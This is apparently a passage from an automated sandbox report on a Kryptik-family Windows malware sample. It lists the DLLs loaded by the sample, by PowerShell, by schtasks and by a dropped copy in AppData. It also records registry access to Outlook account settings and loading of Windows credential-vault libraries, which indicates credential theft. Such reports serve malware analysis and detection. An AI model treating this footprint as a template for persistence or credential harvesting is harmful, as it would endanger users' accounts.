                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.cfg
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
